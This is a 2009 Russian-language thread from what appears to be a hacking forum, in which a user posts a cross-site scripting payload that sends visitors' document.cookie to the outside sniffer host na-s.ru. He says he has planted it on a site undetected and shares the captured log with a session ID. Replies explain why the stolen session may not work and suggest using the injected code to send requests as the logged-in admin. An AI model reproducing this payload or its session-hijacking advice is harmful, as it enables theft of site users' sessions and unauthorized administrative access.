Я воспользовался na-s.ru Куков нет помогите!!

Discussion in 'PHP' started by magnatan, 1 Feb 2009.

  1. magnatan

    magnatan New Member

    Joined:
    11 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Короче вот код <script>img = new Image(); img.src = "http://na-s.ru/images/########.gif?"+document.cookie;</script>

    Я его вставил!! и внедрил !! Админ его не спалил!! точно знаю !! вот что мне выдает !!!

    IP адрес : #####; Хост : ######; Дата : 05:29:56-01.02.09
    Браузер : Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1
    Удаленный порт : 59393; Тип соединения : close
    Откуда пришёл : ###########
    Строка запроса : PHPSESSID=932d484ac6c95ba2da6f892e42783f8d
    popup1=podderzhka_saita
    advmaker_pop=1
    popup2=podderzhka_saita
    s=1
    b=b
    hotlog=1

    #### это мои замены!!!

    гдеже куки???7
     
    #1 magnatan, 1 Feb 2009
    Last edited: 1 Feb 2009
  2. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Видимо создаётся только сессия и админ не ставит галочку "запоминать себя" вот и всё.:)
     
  3. magnatan

    magnatan New Member

    Joined:
    11 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    А разве он когда пароль и логин вводит оно не должно мне показать???


    И еще вопрос как из посетителей !! если их 30 000 админа найти??
     
    #3 magnatan, 1 Feb 2009
    Last edited: 1 Feb 2009
  4. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Да даже если так то в "нормальном" виде тебе нечего непридёт.
    А только сессия которую он открыл.И помни "куки" не живут.;)
     
  5. magnatan

    magnatan New Member

    Joined:
    11 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    в какком смысле не живут??? Подробней можна??
     
  6. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Ну вот смотри...Админ пришёл....пасидел...сессия открылась...админ ушёл...сессия осталась...в след. раз админ пришёл...сессия др будет...

    p.s.даже такой пример.
     
  7. vikseriq

    vikseriq Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    118
    Likes Received:
    44
    Reputations:
    2
    Не живут на чужом. то есть в сессии идет привязка к браузеру и ip-адресу посетителя. то есть тупо копировать-вставить ничего не даст.
     
    1 person likes this.
  8. magnatan

    magnatan New Member

    Joined:
    11 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Ну так в это время пока он ушол я же могу попасть в админ панель или нет???
     
  9. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    С его сессией нет.
     
  10. magnatan

    magnatan New Member

    Joined:
    11 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Ну тогда какой толк от na-s.ru ?????
     
  11. astrologer

    astrologer Elder - Старейшина

    Joined:
    30 Aug 2007
    Messages:
    837
    Likes Received:
    267
    Reputations:
    59
    magnatan, если ты можешь вставлять произвольный код, куки ни к чему - можно и так отправить все нужные запросы от имени админа (если он, конечно, будет авторизован)